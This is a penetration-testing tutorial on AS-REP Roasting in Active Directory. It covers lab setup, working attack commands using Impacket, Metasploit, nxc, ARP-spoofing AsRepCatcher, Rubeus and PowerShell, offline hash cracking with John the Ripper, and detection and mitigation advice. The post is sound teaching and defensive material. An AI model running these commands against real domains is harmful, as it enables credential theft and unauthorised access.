AS-REP Roasting

In this post, we delve into the exploitation of Kerberos accounts with pre-authentication disabled, commonly known as AS-REP Roasting. This attack targets user accounts in Active Directory (AD) environments where Kerberos pre-authentication is not enforced, allowing attackers to extract hashed credentials and potentially crack them offline.

The post outlines lab setup, exploitation methods, and mitigation techniques, mapped to the MITRE ATT&CK framework for clarity. Detection mechanisms and actionable recommendations are also provided to help security professionals identify and defend against this prevalent threat.

Table of Contents

·        AS-REP Roasting

·        Prerequisites

·        Lab Setup

·        Exploitation


Method for Exploitation – AS-REP Roasting Attack (T1558.004)

·        Impacket-GetNPUsers

·        Metasploit

·        Nxc

·        ASREProast MitM

·        ldap_shell tool

·        Rubeus

·        Windows PowerShell – ASREPRoast


Detection & Mitigation


AS-REP Roasting

AS-REP Roasting is an attack targeting the Kerberos authentication protocol. It exploits accounts where Kerberos pre-authentication is disabled, allowing attackers to crack passwords offline.

How the Attack Works:

  1. Request a Ticket: The attacker sends a request to the Key Distribution Center (KDC) for an account with pre-authentication disabled.
  2. Receive Encrypted Data: The KDC sends back an AS-REP response, encrypted using the account's password hash.
  3. Crack the Password: The attacker uses tools to brute-force the password offline. If the password is weak, they gain access.

Why Pre-Authentication Matters

Pre-authentication requires users to prove their identity before the KDC issues an AS-REP response. Without it attackers can request AS-REP responses without knowing the password.



·        Windows Server 2019 as Active Directory

·        Kali Linux

·        Tools: Impacket, Metasploit, nxc, AsRepCatcher, ldap_shell, Powerview, Rubeus

·        Windows 10/11 – As Client


Lab Setup

In this lab setup, we will create a user named 'Yashika' with Kerberos pre-authentication disabled, setting the stage for an AS-REP Roasting attack simulation.

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

·        Install Windows Server (2016 or 2019 recommended).

·        Promote it to a Domain Controller by adding the Active Directory Domain Services role.

·        Set up the domain (e.g., ignite.local).


User Accounts:

·        Create an AD user account named Yashika.

net user yashika Password@1 /add /domain

Disable Kerberos preauthentication for Yashika User:

Once your AD environment is set up, you need to disable Kerberos preauthentication for Yashika user.


·        Open Active Directory Users and Computers (ADUC) on the Domain Controller.

·        Enable the Advanced Features view by clicking on View > Advanced Features.

·        Locate User Yashika in the Users container.

·        Right-click on Yashika User and go to Properties.

·        Go to the Account tab.

·        In the Account options section, check the box for Do not require Kerberos preauthentication option.

·        Apply the settings.

Alternate methods of lab setup


Alternatively, lab setup can be done with the help of BloodyAD, to disable preauthentication:

bloodyAD --host -d ignite.local -u administrator -p Ignite@987 add uac yashika -f DONT_REQ_PREAUTH

And below is the command to re-enable preauthentication:

bloodyAD --host -d ignite.local -u administrator -p Ignite@987 remove uac yashika -f DONT_REQ_PREAUTH



Alternatively, it can be achieved using ldap_shell

ldap_shell ignite.local/administrator:Ignite@987 -dc-ip

To disable pre-authentication:

set_dontreqpreauth yashika true

To re-enable pre-authentication:

set_dontreqpreauth yashika false



Method for Exploitation - AS-REP Roasting Attack (T1558.004)

Attackers can exploit user accounts with Kerberos pre-authentication disabled by requesting encrypted credentials (AS-REP responses) and cracking them offline.


The GetNPUsers script within Impacket can be used to perform AS-REP Roasting attacks and retrieve password hashes.

With a user’s file

impacket-GetNPUsers -dc-ip ignite.local/ -usersfile users.txt -format john -outputfile hashes

Further, with the help of John the Ripper dictionary such as Rockyou can help the attacker to extract the password from the hash.

john -w=/usr/share/wordlists/rockyou.txt hashes

With a specific username

impacket-GetNPUsers ignite.local/yashika -dc-ip -no-pass



This module searches for AD users without pre-auth required. Two different approaches are provided: - Brute force of usernames (does not require a user account; should not lock out accounts) - LDAP lookup (requires an AD user account).

With a user’s file:

use auxiliary/gather/asrep

set rhosts

set domain ignite.local

set user_file users.txt



With a specific username

use auxiliary/gather/asrep

set domain ignite.local

set rhosts

set username yashika





To check whether an account exists within Active Directory without Kerberos protocol, and is vulnerable to asreproast attack

nxc ldap -u "users.txt" -p '' -k

To perform the asreproast attack with a user’s file

nxc ldap -u "users.txt" -p '' --asreproast output.txt

To perform the asreproast attack with a specific username

nxc ldap -u yashika -p '' --asreproast result.txt

ASREProast MitM

ASRepCatcher uses ARP spoofing to catch AS-REP messages returned by the Domain Controller to the clients and prints out the hash to crack.

Clone the repository and install:

git clone

cd AsRepCatcher

python3 install

Run the attack:

AsRepCatcher relay -dc

Crack the hashes:

john –format=krb5asrep -w=/usr/share/wordlists/rockyou.txt asrep_hashes.txt




Rubeus is a powerful post-exploitation tool that attackers can use to interact with Kerberos tickets and perform AS-REP Roasting attacks. It allows attackers to request service tickets for accounts with pre-authentication disabled.

Rubeus.exe asreproast /format:john /outfile:hash.txt

PowerShell - ASREPRoast

The attacker can perform asreproasting using ASREPRoast PowerShell script module.

powershell -ep bypass

Import-Module .\ASREPRoast.ps1


Invoke-ASREPRoast | select -ExpandProperty Hash > hashdump



Detection & Mitigation


Detecting AS-REP Roasting attacks is important to prevent password theft.

Event ID 4768, recorded in the Security Logs on the domain controller, is triggered whenever a Kerberos authentication ticket is requested. Key details to look for in this event include:

·        Ticket Encryption Type: Often 0x17 (RC4 encryption).

·        Pre-Authentication Type: If it is 0, it indicates that preauthentication is disabled, a condition targeted by AS-REP Roasting attacks.

·        Service Name: Typically, krbtgt (Kerberos Ticket-Granting Ticket).


If you see these parameters in your logs, it might signal an AS-REP Roasting attack, as attackers generate these events while tampering with domain accounts. Regularly reviewing logs for these signs can help detect and mitigate this threat.



·        Enable Pre-Authentication: Ensure the "Do not require Kerberos pre-authentication" setting is disabled for all accounts.

·        Use Strong Passwords: Enforce complex, unique passwords and regularly update them.

·        Disable RC4-HMAC: Transition to stronger encryption types like AES128 (0x11) or AES256 (0x12) through Group Policy.

·        Monitor Logs: Monitor the less secure encryption type such as 0x1 & 0x3 (DES) 0x17 & 0x18 (Rc4).



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